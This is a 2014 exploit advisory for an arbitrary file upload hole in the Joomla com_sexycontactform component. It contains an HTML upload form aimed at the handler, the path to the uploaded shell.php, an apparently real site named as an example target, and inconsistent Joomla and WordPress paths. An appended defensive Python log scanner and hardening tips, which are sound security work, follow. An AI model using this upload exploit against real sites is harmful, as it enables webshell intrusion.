
Joomla com_sexycontactform Arbitrary File Upload

Author: jinja, Published: 26-10-2014
############################################################################

# Title : Joomla com_sexycontactform Arbitrary File Upload

# Author : jinja a.k.a mukrim-shine

# Date : 25 October 2014

# Facebook : http://www.facebook.com/x.jinja

# Category : Web Applications

# Greetz : SultanHaikal | Netter | Pod0lz007 | ViruzTomcat | Haji Pahonah | JemsX | Index Php | DevilScreaM

# Vulnerability : Arbitrary File Upload

# Google Dork : use ur brain :p


############################################################################


Bug Location : components/com_sexycontactform/fileupload/index.php

Exploit/Code :

<form method="POST" action="http://target.com/components/com_sexycontactform/fileupload/index.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>

Then the file is accessible under

http://TARGET/wp-content/plugins/sexy-contact-form/includes/fileupload/files/shell.php

Example :

http://vacationsforheroes.com//components/com_sexycontactform/fileupload/index.php
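Added here for site operators, not part of the original advisory: a small access-log scanner that flags the traffic pattern this advisory describes, an unauthenticated POST to the component's fileupload/index.php followed by a GET of a PHP file from its upload directory. The log format (Apache/nginx "combined"), the sample log lines and the client addresses are constructed for the example. Note that the advisory quotes the upload handler under the Joomla path components/com_sexycontactform/... but quotes the uploaded file under a WordPress plugin path (wp-content/plugins/sexy-contact-form/...); the scanner assumes the uploaded files land in the component's own fileupload/files/ directory, so adjust UPLOAD_DIR if your install differs.

```python
"""Flag abuse of the com_sexycontactform upload handler in web-server access logs.

Added detection example for defenders; not code from the advisory or the component.
Assumes Apache/nginx "combined" log format and that uploads are stored in
UPLOAD_DIR (the advisory itself quotes a WordPress-style path, so verify yours).
"""
import re

# Upload endpoint named in the advisory.
UPLOAD_HANDLER = "/components/com_sexycontactform/fileupload/index.php"
# Assumed storage directory for uploaded files (adjust to your installation).
UPLOAD_DIR = "/components/com_sexycontactform/fileupload/files/"
# Extensions a typical PHP-enabled web server executes instead of serving as data.
SCRIPT_EXTENSIONS = (".php", ".phtml", ".php3", ".php5", ".phar")

# "combined" log format: client ident user [time] "METHOD target PROTO" status size ...
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Oct/2014:10:01:02 +0000] "GET /index.php?option=com_sexycontactform HTTP/1.1" 200 5120
203.0.113.7 - - [25/Oct/2014:10:01:09 +0000] "POST /components/com_sexycontactform/fileupload/index.php HTTP/1.1" 200 311
203.0.113.7 - - [25/Oct/2014:10:01:15 +0000] "GET //components/com_sexycontactform/fileupload/files/shell.php HTTP/1.1" 200 87
198.51.100.4 - - [25/Oct/2014:10:02:30 +0000] "GET /components/com_sexycontactform/fileupload/files/resume.pdf HTTP/1.1" 200 40960
198.51.100.4 - - [25/Oct/2014:10:03:01 +0000] "POST /components/com_sexycontactform/fileupload/index.php HTTP/1.1" 403 201
192.0.2.9 - - [25/Oct/2014:11:40:00 +0000] "GET /components/com_sexycontactform/fileupload/files/shell.php HTTP/1.1" 200 87
"""


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Drop the query string and collapse repeated slashes ("//components/..." is
    # the same resource as "/components/..."), then compare case-insensitively.
    path = rec["target"].split("?", 1)[0]
    rec["path"] = re.sub(r"/+", "/", path).lower()
    rec["status"] = int(rec["status"])
    return rec


def classify(rec):
    """Label a single parsed request, or return None when it is not of interest."""
    if rec["method"] == "POST" and rec["path"] == UPLOAD_HANDLER and rec["status"] == 200:
        return "upload_to_unauthenticated_handler"
    if (rec["method"] == "GET" and rec["path"].startswith(UPLOAD_DIR)
            and rec["path"].endswith(SCRIPT_EXTENSIONS)):
        return "script_fetched_from_upload_dir"
    return None


def find_upload_abuse(lines):
    """Scan log lines in order and return (client, method, path, label) tuples.

    A script fetched from the upload directory by a client that earlier posted
    to the handler is escalated to 'webshell_suspected'.
    """
    findings = []
    uploaders = set()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        label = classify(rec)
        if label is None:
            continue
        if label == "upload_to_unauthenticated_handler":
            uploaders.add(rec["client"])
        elif rec["client"] in uploaders:
            label = "webshell_suspected"
        findings.append((rec["client"], rec["method"], rec["path"], label))
    return findings


if __name__ == "__main__":
    for client, method, path, label in find_upload_abuse(SAMPLE_LOG.splitlines()):
        print(f"{label:36} {client:15} {method} {path}")
```

Run it against a real access log with `find_upload_abuse(open("access.log"))`. Any hit on the handler is worth acting on, since the advisory's point is that the endpoint accepts uploads without authentication: remove or update the component, and, independently of that, configure the web server so nothing under the upload directory is executed as PHP (a `php_flag engine off` or an equivalent deny rule for script extensions in that directory) so that a stray upload is served as inert data rather than run.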
